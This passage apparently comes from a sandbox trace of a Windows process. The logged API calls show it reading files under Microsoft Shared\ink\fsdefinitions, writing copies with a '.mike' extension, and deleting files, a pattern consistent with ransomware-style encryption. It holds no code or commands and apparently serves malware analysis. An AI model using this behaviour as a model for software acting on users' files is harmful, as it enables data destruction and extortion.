ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2b1a99, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2b1a99, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd4)) returned 1 [0045.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.200] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.201] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.201] GetFileType (hFile=0x264) returned 0x1 [0045.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.201] GetFileType (hFile=0x264) returned 0x1 [0045.201] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0045.202] WriteFile (in: hFile=0x264, lpBuffer=0x2299b6c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2299b6c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0045.202] CloseHandle (hObject=0x264) returned 1 [0045.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0045.203] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), fInfoLevelId=0x0, lpFileInformation=0x229965c | out: lpFileInformation=0x229965c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2b1a99, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2b1a99, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2b1a99, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd4)) returned 1 [0045.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0045.203] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.203] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.203] GetFileType (hFile=0x264) returned 0x1 [0045.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.203] GetFileType (hFile=0x264) returned 0x1 [0045.203] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0045.203] ReadFile (in: hFile=0x264, lpBuffer=0x229ac9c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x229ac9c*, lpNumberOfBytesRead=0x2af080*=0xd4, lpOverlapped=0x0) returned 1 [0045.204] CloseHandle (hObject=0x264) returned 1 [0045.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.205] GetFileType (hFile=0x264) returned 0x1 [0045.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.205] GetFileType (hFile=0x264) returned 0x1 [0045.205] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0045.205] WriteFile (in: hFile=0x264, lpBuffer=0x229def4*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x229def4*, lpNumberOfBytesWritten=0x2af074*=0xe0, lpOverlapped=0x0) returned 1 [0045.205] CloseHandle (hObject=0x264) returned 1 [0045.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0045.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.206] GetFileType (hFile=0x264) returned 0x1 [0045.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0045.206] GetFileType (hFile=0x264) returned 0x1 [0045.207] WriteFile (in: hFile=0x264, lpBuffer=0x22a1124*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22a1124*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0045.207] CloseHandle (hObject=0x264) returned 1 [0045.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.208] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5258f60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5258f60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5258f60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.209] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22a28d0 | out: lpFileInformation=0x22a28d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5258f60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5258f60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5258f60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.209] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", dwFileAttributes=0x80) returned 0 [0045.210] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.210] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0045.210] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5258f60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5258f60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5258f60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0045.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0045.210] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.210] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.210] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.mike")) returned 1 [0045.226] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.226] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.226] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0045.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0045.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0045.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.274] GetFileType (hFile=0x264) returned 0x1 [0045.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0045.274] GetFileType (hFile=0x264) returned 0x1 [0045.274] CloseHandle (hObject=0x264) returned 1 [0045.274] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.274] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.274] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0045.274] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0045.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.274] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), fInfoLevelId=0x0, lpFileInformation=0x22a4a28 | out: lpFileInformation=0x22a4a28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f47ab01, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f47ab01, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f47ab01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2d7)) returned 1 [0045.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.274] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.275] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), fInfoLevelId=0x0, lpFileInformation=0x22a4d50 | out: lpFileInformation=0x22a4d50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f47ab01, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f47ab01, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f47ab01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2d7)) returned 1 [0045.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.275] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.275] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.275] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.275] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.275] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.275] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.275] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.275] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.275] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.276] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.276] GetFileType (hFile=0x264) returned 0x1 [0045.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.276] GetFileType 